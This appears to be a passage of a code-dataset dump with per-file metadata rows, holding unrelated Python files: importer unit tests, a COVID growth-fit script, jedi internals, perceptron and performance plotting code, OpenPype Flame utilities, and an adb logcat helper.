def test_it_should_create_a_new_note(self):
self.importer.import_note(self.note)
self.mock_collection.newNote.assert_called_with()
def test_it_should_get_the_field_names_from_the_model(self):
self.importer.import_note(self.note)
self.mock_collection.models.fieldNames.assert_called_with(
self.mock_model)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_lowercase(self):
self.mock_collection.models.fieldNames.return_value = ['id']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('id', 100)
def test_it_should_save_the_node_id_if_the_first_field_is_named_id_in_uppercase(self):
self.mock_collection.models.fieldNames.return_value = ['ID']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_called_with('ID', 100)
def test_it_should_populate_the_note_with_the_field_values(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front', 'Back']
self.importer.import_note(self.note)
self.mock_note.__setitem__.assert_has_calls(
[call('Front', 'Front value'), call('Back', 'Back value')])
def test_it_should_ignore_fields_that_do_not_exist_in_the_model(self):
self.note['fields'] = {
'Front': 'Front value',
'Back': 'Back value'
}
self.mock_collection.models.fieldNames.return_value = ['Front']
self.importer.import_note(self.note)
self.assertFalse('Back' in self.mock_note)
def test_it_should_save_the_note_changes(self):
self.importer.import_note(self.note)
self.mock_note.flush.assert_called_with()
def test_it_should_attempt_to_find_an_existing_note_with_the_given_node_id(self):
self.mock_collection.getNote.return_value = self.mock_note
self.mock_collection.db.scalar.return_value = 123
self.importer.import_note(self.note)
self.mock_collection.getNote.assert_called_with(123)
def test_it_should_add_the_note_to_the_collection_if_it_is_new(self):
del self.mock_note.mod
self.importer.import_note(self.note)
self.mock_collection.addNote.assert_called_with(self.mock_note)
def test_it_should_not_add_the_note_to_the_collection_if_it_is_not_new(self):
self.importer.import_note(self.note)
self.assertEqual(0, self.mock_collection.addNote.call_count)
| 38.157025 | 90 | 0.719731 | 4,397 | 0.95235 | 0 | 0 | 0 | 0 | 0 | 0 | 234 | 0.050682 |
c7c11d6e36451e4175726cdb9543215d1fb0fff9 | 1,089 | py | Python | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | analysis/fitexp.py | mfkasim91/idcovid19 | 3e51b16354581a4e0defc635f837f93faff26afc | [
"BSD-3-Clause"
]
| null | null | null | import argparse
import numpy as np
from scipy.stats import linregress
import matplotlib.pyplot as plt
parser = argparse.ArgumentParser()
parser.add_argument("--plot", action="store_const", default=False, const=True)
args = parser.parse_args()
data = np.loadtxt("../data/data.csv", skiprows=1, usecols=list(range(1,8)), delimiter=",")[33:,:]
xdays = data[:,0] - np.mean(data[:,0])
deaths = data[:,-1]
print(xdays, deaths)
logdeaths = np.log(deaths)
slope, offset, rval, pval, stderr = linregress(xdays, logdeaths)
stderr = np.sqrt(np.sum((logdeaths-(slope*logdeaths+offset))**2) / (len(logdeaths)-2.)) / np.sqrt(np.sum((xdays - np.mean(xdays))**2))
if args.plot:
plt.plot(xdays, np.exp(offset + slope*xdays), 'C0-')
plt.plot(xdays, np.exp(offset + (slope+stderr)*xdays), 'C0--')
plt.plot(xdays, np.exp(offset + (slope-stderr)*xdays), 'C0--')
plt.plot(xdays, deaths, 'C0o')
plt.gca().set_yscale("log")
plt.show()
print("Slope: %.3e" % slope)
print("Doubling every: %.2f" % (np.log(2)/slope))
print("R-squared: %.3f" % (rval*rval))
print("Stderr: %.3e" % stderr)
| 35.129032 | 134 | 0.665748 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 135 | 0.123967 |
c7c22a9174889ccacec698f1b477ffd20a7822b0 | 1,716 | py | Python | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 76 | 2020-07-06T14:44:05.000Z | 2022-02-14T15:30:21.000Z | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 20 | 2021-05-03T18:02:23.000Z | 2022-03-12T12:01:04.000Z | .venv/lib/python3.7/site-packages/jedi/inference/lazy_value.py | ITCRStevenLPZ/Proyecto2-Analisis-de-Algoritmos | 4acdbc423428fb2e0068720add69e7870c87929a | [
"Apache-2.0"
]
| 11 | 2020-07-12T16:18:07.000Z | 2022-02-05T16:48:35.000Z | from jedi.inference.base_value import ValueSet, NO_VALUES
from jedi.common import monkeypatch
class AbstractLazyValue(object):
def __init__(self, data, min=1, max=1):
self.data = data
self.min = min
self.max = max
def __repr__(self):
return '<%s: %s>' % (self.__class__.__name__, self.data)
def infer(self):
raise NotImplementedError
class LazyKnownValue(AbstractLazyValue):
"""data is a Value."""
def infer(self):
return ValueSet([self.data])
class LazyKnownValues(AbstractLazyValue):
"""data is a ValueSet."""
def infer(self):
return self.data
class LazyUnknownValue(AbstractLazyValue):
def __init__(self, min=1, max=1):
super(LazyUnknownValue, self).__init__(None, min, max)
def infer(self):
return NO_VALUES
class LazyTreeValue(AbstractLazyValue):
def __init__(self, context, node, min=1, max=1):
super(LazyTreeValue, self).__init__(node, min, max)
self.context = context
# We need to save the predefined names. It's an unfortunate side effect
# that needs to be tracked otherwise results will be wrong.
self._predefined_names = dict(context.predefined_names)
def infer(self):
with monkeypatch(self.context, 'predefined_names', self._predefined_names):
return self.context.infer_node(self.data)
def get_merged_lazy_value(lazy_values):
if len(lazy_values) > 1:
return MergedLazyValues(lazy_values)
else:
return lazy_values[0]
class MergedLazyValues(AbstractLazyValue):
"""data is a list of lazy values."""
def infer(self):
return ValueSet.from_sets(l.infer() for l in self.data)
| 27.677419 | 83 | 0.674825 | 1,448 | 0.843823 | 0 | 0 | 0 | 0 | 0 | 0 | 241 | 0.140443 |
c7c399f4aa408e4541e327b125cd44ba175da7ef | 1,901 | py | Python | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | percept/plot.py | joshleeb/PerceptronVis | 2d0e2f1969e11498533f190f5598c174b7584513 | [
"MIT"
]
| null | null | null | import matplotlib.lines as lines
import matplotlib.pyplot as plt
COLOR_CLASSIFICATIONS = [
'black', # Unclassified
'blue', # Classified True (1)
'red' # Classified False (0)
]
def generate_line(ax, p0, p1, color='black', style='-'):
'''
Generates a line between points p0 and p1 which extends to be the width of
the plot.
'''
x0, y0 = p0
x1, y1 = p1
gradient = (y0 - y1) / (x0 - x1)
intercept = y1 - gradient * x1
x = ax.get_xlim()
data_y = [x[0] * gradient + intercept, x[1] * gradient + intercept]
return lines.Line2D(x, data_y, color=color, linestyle=style)
def get_boundary_plot_fn(weights):
'''
Gets the function used to represent and plot the line representative by the
perceptron's weights. The equation is: f(x) = -(w1/w2)x - w0/w2.
'''
def fn(x):
return -weights[1] / weights[2] * x - weights[0] / weights[2]
return fn
def get_point_color(point, colors):
'''
Get's the color of the point to be displayed.
'''
if point.classification is None:
return colors[0]
return colors[1] if point.classification else colors[2]
def generate(title, class_boundary, weights, points, bounds):
'''
Generates a scatter plot of points with the actualy classification boundary
and the perceptron's classification boundary drawn in.
'''
boundary_fn = get_boundary_plot_fn(weights)
fig, ax = plt.subplots(figsize=(8, 8))
ax.set_xlim(bounds[0])
ax.set_ylim(bounds[1])
ax.set_title(title)
ax.add_line(generate_line(
ax, class_boundary[0], class_boundary[1], 'cyan', '--'
))
ax.add_line(generate_line(ax, (0, boundary_fn(0)), (1, boundary_fn(1))))
ax.scatter(
[pt.x for pt in points], [pt.y for pt in points],
c=[get_point_color(pt, COLOR_CLASSIFICATIONS) for pt in points], s=30
)
return fig
| 29.246154 | 79 | 0.637559 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 570 | 0.299842 |
c7c444c1fb4481f333fa9c3252930b474ff296c2 | 27,392 | py | Python | openpype/hosts/flame/api/lib.py | j-cube/OpenPype | f0849cbd08070a320d19bb55b7e368189a57e3ab | [
"MIT"
]
| 1 | 2022-02-08T15:40:41.000Z | 2022-02-08T15:40:41.000Z | openpype/hosts/flame/api/lib.py | zafrs/OpenPype | 4b8e7e1ed002fc55b31307efdea70b0feaed474f | [
"MIT"
]
| 2 | 2022-03-18T01:46:03.000Z | 2022-03-18T01:46:16.000Z | openpype/hosts/flame/api/lib.py | zafrs/OpenPype | 4b8e7e1ed002fc55b31307efdea70b0feaed474f | [
"MIT"
]
| null | null | null | import sys
import os
import re
import json
import pickle
import tempfile
import itertools
import contextlib
import xml.etree.cElementTree as cET
from copy import deepcopy
from xml.etree import ElementTree as ET
from pprint import pformat
from .constants import (
MARKER_COLOR,
MARKER_DURATION,
MARKER_NAME,
COLOR_MAP,
MARKER_PUBLISH_DEFAULT
)
import openpype.api as openpype
log = openpype.Logger.get_logger(__name__)
FRAME_PATTERN = re.compile(r"[\._](\d+)[\.]")
class CTX:
# singleton used for passing data between api modules
app_framework = None
flame_apps = []
selection = None
@contextlib.contextmanager
def io_preferences_file(klass, filepath, write=False):
try:
flag = "w" if write else "r"
yield open(filepath, flag)
except IOError as _error:
klass.log.info("Unable to work with preferences `{}`: {}".format(
filepath, _error))
class FlameAppFramework(object):
# flameAppFramework class takes care of preferences
class prefs_dict(dict):
def __init__(self, master, name, **kwargs):
self.name = name
self.master = master
if not self.master.get(self.name):
self.master[self.name] = {}
self.master[self.name].__init__()
def __getitem__(self, k):
return self.master[self.name].__getitem__(k)
def __setitem__(self, k, v):
return self.master[self.name].__setitem__(k, v)
def __delitem__(self, k):
return self.master[self.name].__delitem__(k)
def get(self, k, default=None):
return self.master[self.name].get(k, default)
def setdefault(self, k, default=None):
return self.master[self.name].setdefault(k, default)
def pop(self, *args, **kwargs):
return self.master[self.name].pop(*args, **kwargs)
def update(self, mapping=(), **kwargs):
self.master[self.name].update(mapping, **kwargs)
def __contains__(self, k):
return self.master[self.name].__contains__(k)
def copy(self): # don"t delegate w/ super - dict.copy() -> dict :(
return type(self)(self)
def keys(self):
return self.master[self.name].keys()
@classmethod
def fromkeys(cls, keys, v=None):
return cls.master[cls.name].fromkeys(keys, v)
def __repr__(self):
return "{0}({1})".format(
type(self).__name__, self.master[self.name].__repr__())
def master_keys(self):
return self.master.keys()
def __init__(self):
self.name = self.__class__.__name__
self.bundle_name = "OpenPypeFlame"
# self.prefs scope is limited to flame project and user
self.prefs = {}
self.prefs_user = {}
self.prefs_global = {}
self.log = log
try:
import flame
self.flame = flame
self.flame_project_name = self.flame.project.current_project.name
self.flame_user_name = flame.users.current_user.name
except Exception:
self.flame = None
self.flame_project_name = None
self.flame_user_name = None
import socket
self.hostname = socket.gethostname()
if sys.platform == "darwin":
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
"Library",
"Caches",
"OpenPype",
self.bundle_name
)
elif sys.platform.startswith("linux"):
self.prefs_folder = os.path.join(
os.path.expanduser("~"),
".OpenPype",
self.bundle_name)
self.prefs_folder = os.path.join(
self.prefs_folder,
self.hostname,
)
self.log.info("[{}] waking up".format(self.__class__.__name__))
try:
self.load_prefs()
except RuntimeError:
self.save_prefs()
# menu auto-refresh defaults
if not self.prefs_global.get("menu_auto_refresh"):
self.prefs_global["menu_auto_refresh"] = {
"media_panel": True,
"batch": True,
"main_menu": True,
"timeline_menu": True
}
self.apps = []
def get_pref_file_paths(self):
prefix = self.prefs_folder + os.path.sep + self.bundle_name
prefs_file_path = "_".join([
prefix, self.flame_user_name,
self.flame_project_name]) + ".prefs"
prefs_user_file_path = "_".join([
prefix, self.flame_user_name]) + ".prefs"
prefs_global_file_path = prefix + ".prefs"
return (prefs_file_path, prefs_user_file_path, prefs_global_file_path)
def load_prefs(self):
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path) as prefs_file:
self.prefs = pickle.load(prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path) as prefs_file:
self.prefs_user = pickle.load(prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path) as prefs_file:
self.prefs_global = pickle.load(prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def save_prefs(self):
# make sure the preference folder is available
if not os.path.isdir(self.prefs_folder):
try:
os.makedirs(self.prefs_folder)
except Exception:
self.log.info("Unable to create folder {}".format(
self.prefs_folder))
return False
# get all pref file paths
(proj_pref_path, user_pref_path,
glob_pref_path) = self.get_pref_file_paths()
with io_preferences_file(self, proj_pref_path, True) as prefs_file:
pickle.dump(self.prefs, prefs_file)
self.log.info(
"Project - preferences contents:\n{}".format(
pformat(self.prefs)
))
with io_preferences_file(self, user_pref_path, True) as prefs_file:
pickle.dump(self.prefs_user, prefs_file)
self.log.info(
"User - preferences contents:\n{}".format(
pformat(self.prefs_user)
))
with io_preferences_file(self, glob_pref_path, True) as prefs_file:
pickle.dump(self.prefs_global, prefs_file)
self.log.info(
"Global - preferences contents:\n{}".format(
pformat(self.prefs_global)
))
return True
def get_current_project():
import flame
return flame.project.current_project
def get_current_sequence(selection):
import flame
def segment_to_sequence(_segment):
track = _segment.parent
version = track.parent
return version.parent
process_timeline = None
if len(selection) == 1:
if isinstance(selection[0], flame.PySequence):
process_timeline = selection[0]
if isinstance(selection[0], flame.PySegment):
process_timeline = segment_to_sequence(selection[0])
else:
for segment in selection:
if isinstance(segment, flame.PySegment):
process_timeline = segment_to_sequence(segment)
break
return process_timeline
def rescan_hooks():
import flame
try:
flame.execute_shortcut('Rescan Python Hooks')
except Exception:
pass
def get_metadata(project_name, _log=None):
# TODO: can be replaced by MediaInfoFile class method
from adsk.libwiretapPythonClientAPI import (
WireTapClient,
WireTapServerHandle,
WireTapNodeHandle,
WireTapStr
)
class GetProjectColorPolicy(object):
def __init__(self, host_name=None, _log=None):
# Create a connection to the Backburner manager using the Wiretap
# python API.
#
self.log = _log or log
self.host_name = host_name or "localhost"
self._wiretap_client = WireTapClient()
if not self._wiretap_client.init():
raise Exception("Could not initialize Wiretap Client")
self._server = WireTapServerHandle(
"{}:IFFFS".format(self.host_name))
def process(self, project_name):
policy_node_handle = WireTapNodeHandle(
self._server,
"/projects/{}/syncolor/policy".format(project_name)
)
self.log.info(policy_node_handle)
policy = WireTapStr()
if not policy_node_handle.getNodeTypeStr(policy):
self.log.warning(
"Could not retrieve policy of '%s': %s" % (
policy_node_handle.getNodeId().id(),
policy_node_handle.lastError()
)
)
return policy.c_str()
policy_wiretap = GetProjectColorPolicy(_log=_log)
return policy_wiretap.process(project_name)
def get_segment_data_marker(segment, with_marker=None):
"""
Get openpype track item tag created by creator or loader plugin.
Attributes:
segment (flame.PySegment): flame api object
with_marker (bool)[optional]: if true it will return also marker object
Returns:
dict: openpype tag data
Returns(with_marker=True):
flame.PyMarker, dict
"""
for marker in segment.markers:
comment = marker.comment.get_value()
color = marker.colour.get_value()
name = marker.name.get_value()
if (name == MARKER_NAME) and (
color == COLOR_MAP[MARKER_COLOR]):
if not with_marker:
return json.loads(comment)
else:
return marker, json.loads(comment)
def set_segment_data_marker(segment, data=None):
"""
Set openpype track item tag to input segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
dict: json loaded data
"""
data = data or dict()
marker_data = get_segment_data_marker(segment, True)
if marker_data:
# get available openpype tag if any
marker, tag_data = marker_data
# update tag data with new data
tag_data.update(data)
# update marker with tag data
marker.comment = json.dumps(tag_data)
else:
# update tag data with new data
marker = create_segment_data_marker(segment)
# add tag data to marker's comment
marker.comment = json.dumps(data)
def set_publish_attribute(segment, value):
""" Set Publish attribute in input Tag object
Attribute:
segment (flame.PySegment)): flame api object
value (bool): True or False
"""
tag_data = get_segment_data_marker(segment)
tag_data["publish"] = value
# set data to the publish attribute
set_segment_data_marker(segment, tag_data)
def get_publish_attribute(segment):
""" Get Publish attribute from input Tag object
Attribute:
segment (flame.PySegment)): flame api object
Returns:
bool: True or False
"""
tag_data = get_segment_data_marker(segment)
if not tag_data:
set_publish_attribute(segment, MARKER_PUBLISH_DEFAULT)
return MARKER_PUBLISH_DEFAULT
return tag_data["publish"]
def create_segment_data_marker(segment):
""" Create openpype marker on a segment.
Attributes:
segment (flame.PySegment): flame api object
Returns:
flame.PyMarker: flame api object
"""
# get duration of segment
duration = segment.record_duration.relative_frame
# calculate start frame of the new marker
start_frame = int(segment.record_in.relative_frame) + int(duration / 2)
# create marker
marker = segment.create_marker(start_frame)
# set marker name
marker.name = MARKER_NAME
# set duration
marker.duration = MARKER_DURATION
# set colour
marker.colour = COLOR_MAP[MARKER_COLOR] # Red
return marker
def get_sequence_segments(sequence, selected=False):
segments = []
# loop versions in sequence
for ver in sequence.versions:
# loop track in versions
for track in ver.tracks:
# ignore all empty tracks and hidden too
if len(track.segments) == 0 and track.hidden:
continue
# loop all segment in remaining tracks
for segment in track.segments:
if segment.name.get_value() == "":
continue
if segment.hidden.get_value() is True:
continue
if (
selected is True
and segment.selected.get_value() is not True
):
continue
# add it to original selection
segments.append(segment)
return segments
@contextlib.contextmanager
def maintained_segment_selection(sequence):
"""Maintain selection during context
Attributes:
sequence (flame.PySequence): python api object
Yield:
list of flame.PySegment
Example:
>>> with maintained_segment_selection(sequence) as selected_segments:
... for segment in selected_segments:
... segment.selected = False
>>> print(segment.selected)
True
"""
selected_segments = get_sequence_segments(sequence, True)
try:
# do the operation on selected segments
yield selected_segments
finally:
# reset all selected clips
reset_segment_selection(sequence)
# select only original selection of segments
for segment in selected_segments:
segment.selected = True
def reset_segment_selection(sequence):
"""Deselect all selected nodes
"""
for ver in sequence.versions:
for track in ver.tracks:
if len(track.segments) == 0 and track.hidden:
continue
for segment in track.segments:
segment.selected = False
def _get_shot_tokens_values(clip, tokens):
old_value = None
output = {}
if not clip.shot_name:
return output
old_value = clip.shot_name.get_value()
for token in tokens:
clip.shot_name.set_value(token)
_key = str(re.sub("[<>]", "", token)).replace(" ", "_")
try:
output[_key] = int(clip.shot_name.get_value())
except ValueError:
output[_key] = clip.shot_name.get_value()
clip.shot_name.set_value(old_value)
return output
def get_segment_attributes(segment):
if segment.name.get_value() == "":
return None
# Add timeline segment to tree
clip_data = {
"shot_name": segment.shot_name.get_value(),
"segment_name": segment.name.get_value(),
"segment_comment": segment.comment.get_value(),
"tape_name": segment.tape_name,
"source_name": segment.source_name,
"fpath": segment.file_path,
"PySegment": segment
}
# head and tail with forward compatibility
if segment.head:
# `infinite` can be also returned
if isinstance(segment.head, str):
clip_data["segment_head"] = 0
else:
clip_data["segment_head"] = int(segment.head)
if segment.tail:
# `infinite` can be also returned
if isinstance(segment.tail, str):
clip_data["segment_tail"] = 0
else:
clip_data["segment_tail"] = int(segment.tail)
# add all available shot tokens
shot_tokens = _get_shot_tokens_values(segment, [
"<colour space>", "<width>", "<height>", "<depth>", "<segment>",
"<track>", "<track name>"
])
clip_data.update(shot_tokens)
# populate shot source metadata
segment_attrs = [
"record_duration", "record_in", "record_out",
"source_duration", "source_in", "source_out"
]
segment_attrs_data = {}
for attr_name in segment_attrs:
if not hasattr(segment, attr_name):
continue
attr = getattr(segment, attr_name)
segment_attrs_data[attr] = str(attr).replace("+", ":")
if attr_name in ["record_in", "record_out"]:
clip_data[attr_name] = attr.relative_frame
else:
clip_data[attr_name] = attr.frame
clip_data["segment_timecodes"] = segment_attrs_data
return clip_data
def get_clips_in_reels(project):
output_clips = []
project_desktop = project.current_workspace.desktop
for reel_group in project_desktop.reel_groups:
for reel in reel_group.reels:
for clip in reel.clips:
clip_data = {
"PyClip": clip,
"fps": float(str(clip.frame_rate)[:-4])
}
attrs = [
"name", "width", "height",
"ratio", "sample_rate", "bit_depth"
]
for attr in attrs:
val = getattr(clip, attr)
clip_data[attr] = val
version = clip.versions[-1]
track = version.tracks[-1]
for segment in track.segments:
segment_data = get_segment_attributes(segment)
clip_data.update(segment_data)
output_clips.append(clip_data)
return output_clips
def get_reformated_filename(filename, padded=True):
"""
Return fixed python expression path
Args:
filename (str): file name
Returns:
type: string with reformated path
Example:
get_reformated_filename("plate.1001.exr") > plate.%04d.exr
"""
found = FRAME_PATTERN.search(filename)
if not found:
log.info("File name is not sequence: {}".format(filename))
return filename
padding = get_padding_from_filename(filename)
replacement = "%0{}d".format(padding) if padded else "%d"
start_idx, end_idx = found.span(1)
return replacement.join(
[filename[:start_idx], filename[end_idx:]]
)
def get_padding_from_filename(filename):
"""
Return padding number from Flame path style
Args:
filename (str): file name
Returns:
int: padding number
Example:
get_padding_from_filename("plate.0001.exr") > 4
"""
found = get_frame_from_filename(filename)
return len(found) if found else None
def get_frame_from_filename(filename):
"""
Return sequence number from Flame path style
Args:
filename (str): file name
Returns:
int: sequence frame number
Example:
def get_frame_from_filename(path):
("plate.0001.exr") > 0001
"""
found = re.findall(FRAME_PATTERN, filename)
return found.pop() if found else None
@contextlib.contextmanager
def maintained_object_duplication(item):
"""Maintain input item duplication
Attributes:
item (any flame.PyObject): python api object
Yield:
duplicate input PyObject type
"""
import flame
# Duplicate the clip to avoid modifying the original clip
duplicate = flame.duplicate(item)
try:
# do the operation on selected segments
yield duplicate
finally:
# delete the item at the end
flame.delete(duplicate)
@contextlib.contextmanager
def maintained_temp_file_path(suffix=None):
_suffix = suffix or ""
try:
# Store dumped json to temporary file
temporary_file = tempfile.mktemp(
suffix=_suffix, prefix="flame_maintained_")
yield temporary_file.replace("\\", "/")
except IOError as _error:
raise IOError(
"Not able to create temp json file: {}".format(_error))
finally:
# Remove the temporary json
os.remove(temporary_file)
def get_clip_segment(flame_clip):
name = flame_clip.name.get_value()
version = flame_clip.versions[0]
track = version.tracks[0]
segments = track.segments
if len(segments) < 1:
raise ValueError("Clip `{}` has no segments!".format(name))
if len(segments) > 1:
raise ValueError("Clip `{}` has too many segments!".format(name))
return segments[0]
def get_batch_group_from_desktop(name):
project = get_current_project()
project_desktop = project.current_workspace.desktop
for bgroup in project_desktop.batch_groups:
if bgroup.name.get_value() in name:
return bgroup
class MediaInfoFile(object):
"""Class to get media info file clip data
Raises:
IOError: MEDIA_SCRIPT_PATH path doesn't exists
TypeError: Not able to generate clip xml data file
ET.ParseError: Missing clip in xml clip data
IOError: Not able to save xml clip data to file
Attributes:
str: `MEDIA_SCRIPT_PATH` path to flame binary
logging.Logger: `log` logger
TODO: add method for getting metadata to dict
"""
MEDIA_SCRIPT_PATH = "/opt/Autodesk/mio/current/dl_get_media_info"
log = log
_clip_data = None
_start_frame = None
_fps = None
_drop_mode = None
def __init__(self, path, **kwargs):
# replace log if any
if kwargs.get("logger"):
self.log = kwargs["logger"]
# test if `dl_get_media_info` paht exists
self._validate_media_script_path()
# derivate other feed variables
self.feed_basename = os.path.basename(path)
self.feed_dir = os.path.dirname(path)
self.feed_ext = os.path.splitext(self.feed_basename)[1][1:].lower()
with maintained_temp_file_path(".clip") as tmp_path:
self.log.info("Temp File: {}".format(tmp_path))
self._generate_media_info_file(tmp_path)
# get clip data and make them single if there is multiple
# clips data
xml_data = self._make_single_clip_media_info(tmp_path)
self.log.debug("xml_data: {}".format(xml_data))
self.log.debug("type: {}".format(type(xml_data)))
# get all time related data and assign them
self._get_time_info_from_origin(xml_data)
self.log.debug("start_frame: {}".format(self.start_frame))
self.log.debug("fps: {}".format(self.fps))
self.log.debug("drop frame: {}".format(self.drop_mode))
self.clip_data = xml_data
@property
def clip_data(self):
"""Clip's xml clip data
Returns:
xml.etree.ElementTree: xml data
"""
return self._clip_data
@clip_data.setter
def clip_data(self, data):
self._clip_data = data
@property
def start_frame(self):
""" Clip's starting frame found in timecode
Returns:
int: number of frames
"""
return self._start_frame
@start_frame.setter
def start_frame(self, number):
self._start_frame = int(number)
@property
def fps(self):
""" Clip's frame rate
Returns:
float: frame rate
"""
return self._fps
@fps.setter
def fps(self, fl_number):
self._fps = float(fl_number)
@property
def drop_mode(self):
""" Clip's drop frame mode
Returns:
str: drop frame flag
"""
return self._drop_mode
@drop_mode.setter
def drop_mode(self, text):
self._drop_mode = str(text)
def _validate_media_script_path(self):
if not os.path.isfile(self.MEDIA_SCRIPT_PATH):
raise IOError("Media Scirpt does not exist: `{}`".format(
self.MEDIA_SCRIPT_PATH))
def _generate_media_info_file(self, fpath):
# Create cmd arguments for gettig xml file info file
cmd_args = [
self.MEDIA_SCRIPT_PATH,
"-e", self.feed_ext,
"-o", fpath,
self.feed_dir
]
try:
# execute creation of clip xml template data
openpype.run_subprocess(cmd_args)
except TypeError as error:
raise TypeError(
"Error creating `{}` due: {}".format(fpath, error))
def _make_single_clip_media_info(self, fpath):
with open(fpath) as f:
lines = f.readlines()
_added_root = itertools.chain(
"<root>", deepcopy(lines)[1:], "</root>")
new_root = ET.fromstringlist(_added_root)
# find the clip which is matching to my input name
xml_clips = new_root.findall("clip")
matching_clip = None
for xml_clip in xml_clips:
if xml_clip.find("name").text in self.feed_basename:
matching_clip = xml_clip
if matching_clip is None:
# return warning there is missing clip
raise ET.ParseError(
"Missing clip in `{}`. Available clips {}".format(
self.feed_basename, [
xml_clip.find("name").text
for xml_clip in xml_clips
]
))
return matching_clip
def _get_time_info_from_origin(self, xml_data):
try:
for out_track in xml_data.iter('track'):
for out_feed in out_track.iter('feed'):
# start frame
out_feed_nb_ticks_obj = out_feed.find(
'startTimecode/nbTicks')
self.start_frame = out_feed_nb_ticks_obj.text
# fps
out_feed_fps_obj = out_feed.find(
'startTimecode/rate')
self.fps = out_feed_fps_obj.text
# drop frame mode
out_feed_drop_mode_obj = out_feed.find(
'startTimecode/dropMode')
self.drop_mode = out_feed_drop_mode_obj.text
break
else:
continue
except Exception as msg:
self.log.warning(msg)
@staticmethod
def write_clip_data_to_file(fpath, xml_element_data):
""" Write xml element of clip data to file
Args:
fpath (string): file path
xml_element_data (xml.etree.ElementTree.Element): xml data
Raises:
IOError: If data could not be written to file
"""
try:
# save it as new file
tree = cET.ElementTree(xml_element_data)
tree.write(
fpath, xml_declaration=True,
method='xml', encoding='UTF-8'
)
except IOError as error:
raise IOError(
"Not able to write data to file: {}".format(error))
| 29.109458 | 79 | 0.593531 | 13,810 | 0.504162 | 2,053 | 0.074949 | 3,960 | 0.144568 | 0 | 0 | 6,952 | 0.253797 |
c7c5220186916c25d94c94c265afef27d8cdfced | 1,287 | py | Python | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | newanalysis/plot_performances.py | nriesterer/cogsci-individualization | da97bf0a6b53f440670e22ff591348f3d3fab230 | [
"MIT"
]
| null | null | null | import sys
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
if len(sys.argv) != 3:
print('usage: python plot_performances.py <group_csv> <indiv_csv>')
exit()
group_file = sys.argv[1]
indiv_file = sys.argv[2]
# Load the data
df_group = pd.read_csv(group_file)
df_indiv = pd.read_csv(indiv_file)
df = pd.concat([df_group, df_indiv], sort=True)
# Prepare the data for plotting
plot_df = df.groupby(['model', 'id'], as_index=False)['hit'].agg('mean')
mfa_df = plot_df.loc[plot_df['model'] == 'MFA']
mfa_median = mfa_df['hit'].median()
plot_df = plot_df.loc[plot_df['model'] != 'MFA']
# Plot the data
sns.set(style='whitegrid', palette='colorblind')
plt.figure(figsize=(7, 3))
order = plot_df.groupby('model', as_index=False)['hit'].agg('median').sort_values('hit')['model']
colors = [('C0' if 'mReasoner' in x else 'C2') for x in order]
sns.boxplot(x='model', y='hit', data=plot_df, order=order, palette=colors)
plt.axhline(y=mfa_median, ls='--', color='C7', zorder=10)
plt.text(0.002, mfa_median + 0.015, 'MFA', color='C7', fontsize=10, transform=plt.gca().transAxes)
plt.xlabel('')
plt.yticks(np.arange(0, 1.1, 0.1))
plt.ylabel('Coverage Accuracy')
plt.tight_layout()
plt.savefig('visualizations/performances.pdf')
plt.show()
| 28.6 | 98 | 0.700855 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 329 | 0.255633 |
c7c52b0c2a58b302536c4281e3d875f7998a6140 | 611 | py | Python | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | src/helpers.py | demirdagemir/thesis | 4a48bddf815c91729e27484548bb7bbf7ddeda64 | [
"MIT"
]
| null | null | null | from Aion.utils.data import getADBPath
import subprocess
def dumpLogCat(apkTarget):
# Aion/shared/DroidutanTest.py
# Define frequently-used commands
# TODO: Refactor adbID
adbID = "192.168.58.101:5555"
adbPath = getADBPath()
dumpLogcatCmd = [adbPath, "-s", adbID, "logcat", "-d"]
clearLogcatCmd = [adbPath, "-s", adbID, "-c"]
# 5. Dump the system log to file
logcatFile = open(apkTarget.replace(".apk", ".log"), "w")
prettyPrint("Dumping logcat")
subprocess.Popen(dumpLogcatCmd, stderr=subprocess.STDOUT, stdout=logcatFile).communicate()[0]
logcatFile.close()
| 33.944444 | 97 | 0.680851 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 194 | 0.317512 |
